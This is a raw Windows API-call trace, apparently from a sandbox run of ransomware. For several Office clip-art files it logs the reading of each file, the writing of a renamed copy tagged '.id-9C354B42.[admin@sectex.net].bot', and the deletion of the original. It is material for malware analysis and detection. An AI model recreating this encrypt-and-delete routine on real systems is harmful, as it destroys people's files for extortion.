	[0058.483] lstrlenW (lpString=".ppt") returned 4
	[0058.483] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.483] lstrlenW (lpString=".zip") returned 4
	[0058.483] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.483] lstrlenW (lpString=".rar") returned 4
	[0058.483] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.483] lstrlenW (lpString=".bz2") returned 4
	[0058.483] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.483] lstrlenW (lpString=".7z") returned 3
	[0058.483] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.483] lstrlenW (lpString=".dbf") returned 4
	[0058.483] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.483] lstrlenW (lpString=".1cd") returned 4
	[0058.483] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.483] lstrlenW (lpString=".jpg") returned 4
	[0058.483] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.483] lstrlenW (lpString=".doc") returned 4
	[0058.483] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.483] lstrlenW (lpString=".docx") returned 5
	[0058.483] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.483] lstrlenW (lpString=".pdf") returned 4
	[0058.483] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.483] lstrlenW (lpString=".xls") returned 4
	[0058.483] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.483] lstrlenW (lpString=".xlsx") returned 5
	[0058.483] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.483] lstrlenW (lpString=".ppt") returned 4
	[0058.483] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.484] lstrlenW (lpString=".zip") returned 4
	[0058.484] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.484] lstrlenW (lpString=".rar") returned 4
	[0058.484] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.484] lstrlenW (lpString=".bz2") returned 4
	[0058.484] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.484] lstrlenW (lpString=".7z") returned 3
	[0058.484] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.484] lstrlenW (lpString=".dbf") returned 4
	[0058.484] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.484] lstrlenW (lpString=".1cd") returned 4
	[0058.484] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63
	[0058.484] lstrlenW (lpString=".jpg") returned 4
	[0058.484] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.484] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.484] lstrlenW (lpString="AN01039_.WMF") returned 12
	[0058.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0058.484] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=3344) returned 1
	[0058.484] CloseHandle (hObject=0x184) returned 1
	[0058.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf")) returned 0x20
	[0058.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0058.485] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.485] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0058.485] GetLastError () returned 0x0
	[0058.485] ReadFile (in: hFile=0x184, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xd10, lpOverlapped=0x0) returned 1
	[0058.548] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xd20, lpOverlapped=0x0) returned 1
	[0058.549] ReadFile (in: hFile=0x184, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.549] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.549] SetEndOfFile (hFile=0x204) returned 1
	[0058.848] CloseHandle (hObject=0x204) returned 1
	[0058.849] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.849] SetEndOfFile (hFile=0x184) returned 1
	[0058.857] CloseHandle (hObject=0x184) returned 1
	[0058.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.865] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf")) returned 1
	[0058.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.873] lstrlenW (lpString=".doc") returned 4
	[0058.879] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.879] lstrlenW (lpString=".docx") returned 5
	[0058.880] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.880] lstrlenW (lpString=".pdf") returned 4
	[0058.880] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.880] lstrlenW (lpString=".xls") returned 4
	[0058.880] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.880] lstrlenW (lpString=".xlsx") returned 5
	[0058.880] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.880] lstrlenW (lpString=".ppt") returned 4
	[0058.880] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.880] lstrlenW (lpString=".zip") returned 4
	[0058.880] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.880] lstrlenW (lpString=".rar") returned 4
	[0058.880] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.880] lstrlenW (lpString=".bz2") returned 4
	[0058.880] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.880] lstrlenW (lpString=".7z") returned 3
	[0058.880] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.880] lstrlenW (lpString=".dbf") returned 4
	[0058.880] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.880] lstrlenW (lpString=".1cd") returned 4
	[0058.881] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.881] lstrlenW (lpString=".jpg") returned 4
	[0058.881] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.881] lstrlenW (lpString=".doc") returned 4
	[0058.881] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.881] lstrlenW (lpString=".docx") returned 5
	[0058.881] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.881] lstrlenW (lpString=".pdf") returned 4
	[0058.881] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.881] lstrlenW (lpString=".xls") returned 4
	[0058.881] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.881] lstrlenW (lpString=".xlsx") returned 5
	[0058.881] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.881] lstrlenW (lpString=".ppt") returned 4
	[0058.881] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.881] lstrlenW (lpString=".zip") returned 4
	[0058.881] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.881] lstrlenW (lpString=".rar") returned 4
	[0058.881] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.881] lstrlenW (lpString=".bz2") returned 4
	[0058.881] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.881] lstrlenW (lpString=".7z") returned 3
	[0058.881] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.881] lstrlenW (lpString=".dbf") returned 4
	[0058.882] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.882] lstrlenW (lpString=".1cd") returned 4
	[0058.882] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63
	[0058.882] lstrlenW (lpString=".jpg") returned 4
	[0058.882] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.882] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.882] lstrlenW (lpString="AN01218_.WMF") returned 12
	[0058.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0058.882] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=3012) returned 1
	[0058.882] CloseHandle (hObject=0x184) returned 1
	[0058.882] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf")) returned 0x20
	[0058.882] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0058.883] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.883] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0058.883] GetLastError () returned 0x0
	[0058.883] ReadFile (in: hFile=0x184, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xbc4, lpOverlapped=0x0) returned 1
	[0058.884] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xbd0, lpOverlapped=0x0) returned 1
	[0058.885] ReadFile (in: hFile=0x184, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.885] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.885] SetEndOfFile (hFile=0x204) returned 1
	[0058.886] CloseHandle (hObject=0x204) returned 1
	[0058.886] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.886] SetEndOfFile (hFile=0x184) returned 1
	[0058.886] CloseHandle (hObject=0x184) returned 1
	[0058.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.887] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf")) returned 1
	[0058.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.887] lstrlenW (lpString=".doc") returned 4
	[0058.887] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.887] lstrlenW (lpString=".docx") returned 5
	[0058.887] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.887] lstrlenW (lpString=".pdf") returned 4
	[0058.887] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.887] lstrlenW (lpString=".xls") returned 4
	[0058.887] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.887] lstrlenW (lpString=".xlsx") returned 5
	[0058.887] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.887] lstrlenW (lpString=".ppt") returned 4
	[0058.887] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.887] lstrlenW (lpString=".zip") returned 4
	[0058.887] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.887] lstrlenW (lpString=".rar") returned 4
	[0058.887] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.887] lstrlenW (lpString=".bz2") returned 4
	[0058.887] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.888] lstrlenW (lpString=".7z") returned 3
	[0058.888] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.888] lstrlenW (lpString=".dbf") returned 4
	[0058.888] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.888] lstrlenW (lpString=".1cd") returned 4
	[0058.888] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.888] lstrlenW (lpString=".jpg") returned 4
	[0058.888] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.888] lstrlenW (lpString=".doc") returned 4
	[0058.888] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.888] lstrlenW (lpString=".docx") returned 5
	[0058.888] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.888] lstrlenW (lpString=".pdf") returned 4
	[0058.888] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.888] lstrlenW (lpString=".xls") returned 4
	[0058.888] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.888] lstrlenW (lpString=".xlsx") returned 5
	[0058.888] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.888] lstrlenW (lpString=".ppt") returned 4
	[0058.888] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.888] lstrlenW (lpString=".zip") returned 4
	[0058.888] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.888] lstrlenW (lpString=".rar") returned 4
	[0058.888] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.888] lstrlenW (lpString=".bz2") returned 4
	[0058.888] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.888] lstrlenW (lpString=".7z") returned 3
	[0058.888] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.889] lstrlenW (lpString=".dbf") returned 4
	[0058.889] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.889] lstrlenW (lpString=".1cd") returned 4
	[0058.889] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63
	[0058.889] lstrlenW (lpString=".jpg") returned 4
	[0058.889] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.889] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.889] lstrlenW (lpString="AN01251_.WMF") returned 12
	[0058.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0058.889] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=2756) returned 1
	[0058.889] CloseHandle (hObject=0x184) returned 1
	[0058.889] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf")) returned 0x20
	[0058.889] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0058.890] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.890] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0058.890] GetLastError () returned 0x0
	[0058.890] ReadFile (in: hFile=0x184, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xac4, lpOverlapped=0x0) returned 1
	[0058.891] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xad0, lpOverlapped=0x0) returned 1
	[0058.892] ReadFile (in: hFile=0x184, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.892] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.892] SetEndOfFile (hFile=0x204) returned 1
	[0058.893] CloseHandle (hObject=0x204) returned 1
	[0058.893] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.893] SetEndOfFile (hFile=0x184) returned 1
	[0058.894] CloseHandle (hObject=0x184) returned 1
	[0058.894] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.894] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf")) returned 1
	[0058.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.894] lstrlenW (lpString=".doc") returned 4
	[0058.894] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.894] lstrlenW (lpString=".docx") returned 5
	[0058.894] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.894] lstrlenW (lpString=".pdf") returned 4
	[0058.894] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.894] lstrlenW (lpString=".xls") returned 4
	[0058.894] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.894] lstrlenW (lpString=".xlsx") returned 5
	[0058.894] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.894] lstrlenW (lpString=".ppt") returned 4
	[0058.894] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.894] lstrlenW (lpString=".zip") returned 4
	[0058.894] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.894] lstrlenW (lpString=".rar") returned 4
